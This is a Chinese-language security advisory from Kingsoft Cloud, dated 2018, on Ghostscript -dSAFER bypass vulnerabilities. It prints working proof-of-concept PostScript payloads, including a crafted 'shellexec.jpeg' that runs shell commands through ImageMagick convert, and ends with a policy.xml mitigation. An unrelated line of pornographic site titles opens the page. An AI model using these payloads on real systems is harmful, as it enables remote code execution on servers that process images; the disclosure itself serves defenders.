91百色国产视频|亚洲欧美伦理中文字幕在线|亚洲中文乱码在线|天堂影音av在线|国产激情人妻熟女|AV无码高清在线|超碰在线免费观看操|亚洲va中文字幕|欧美极品性爱四区|国产精品二区在线观看

官方公告

了解金山云最新公告

公告 > 安全公告 > Ghostscript存在多個(gè)漏洞,可導(dǎo)致遠(yuǎn)程代碼執(zhí)行
Ghostscript存在多個(gè)漏洞,可導(dǎo)致遠(yuǎn)程代碼執(zhí)行

2018-08-22 19:41:00

2018年8月22日,金山云安全應(yīng)急響應(yīng)中心監(jiān)控到外界安全研究員Tavis Ormandy公布了與Ghostscript漏洞有關(guān)的細(xì)節(jié)信息,這些漏洞若被利用,可導(dǎo)致遠(yuǎn)程代碼執(zhí)行。


漏洞編號(hào)

       還未分配漏洞編號(hào)

漏洞名稱

      Ghostscript 遠(yuǎn)程代碼執(zhí)行

漏洞危害等級(jí)

高危

漏洞描述

       攻擊者可利用惡意PostScript、PDF、EPS或XPS文件觸發(fā)漏洞,以下為漏洞簡介:

1./invalidaccess 恢復(fù)失敗后會(huì)結(jié)束,可控制錯(cuò)誤處理部分

$ *gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null*GS>*legal*GS>*{ null restore } stopped { pop } if*GS>*legal*GS>*mark /OutputFile (%pipe%id) currentdevice putdeviceprops*GS<1>*showpage*

uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)

context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


2.setcolor可通過setpattern間接調(diào)用且未進(jìn)行檢查

$ *gs -q -sDEVICE=ppmraw -dSAFER*GS>*<< /Whatever 16#414141414141 >> setpattern*Segmentation fault


3.LockDistillerParams布爾值未進(jìn)行類型檢查

$ *gs -q -sDEVICE=ppmraw -dSAFER*GS>*<< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams*Segmentation fault


4. .tempfile權(quán)限管理未生效

Ubuntu:
$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undefsave
legal
{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


CentOS:
$ *cat shellexec.jpeg*
%!PS
userdict /setpagedevice undeflegal
{ null restore } stopped { pop } iflegal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
$ *convert shellexec.jpeg whatever.gif*
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


影響版本

截止目前,Artifex Software,ImageMagick,Redhat,Ubuntu已經(jīng)說明會(huì)受到此漏洞影響,CoreOS宣布不受影響。

修復(fù)方案

1.   目前官方還未發(fā)布補(bǔ)丁,請關(guān)注補(bǔ)丁更新信息并進(jìn)行修復(fù)工作。

2.   CERT/CC發(fā)布安全通告,對此漏洞進(jìn)行預(yù)警,其中漏洞描述為“-dSAFER沙箱繞過漏洞”,給出的臨時(shí)解決方案是在ImageMagick policy.xml中禁用PostScript、EPS、PDF以及XPS解碼器。

<policy domain =“coder”rights =“none”pattern =“PS”/> <policy domain =“coder”rights =“none”pattern =“EPS”/> <policy domain =“coder”rights =“none” pattern =“PDF”/> <policy domain =“coder”rights =“none”pattern =“XPS”/>


北京金山云網(wǎng)絡(luò)技術(shù)有限公司

2018/08/22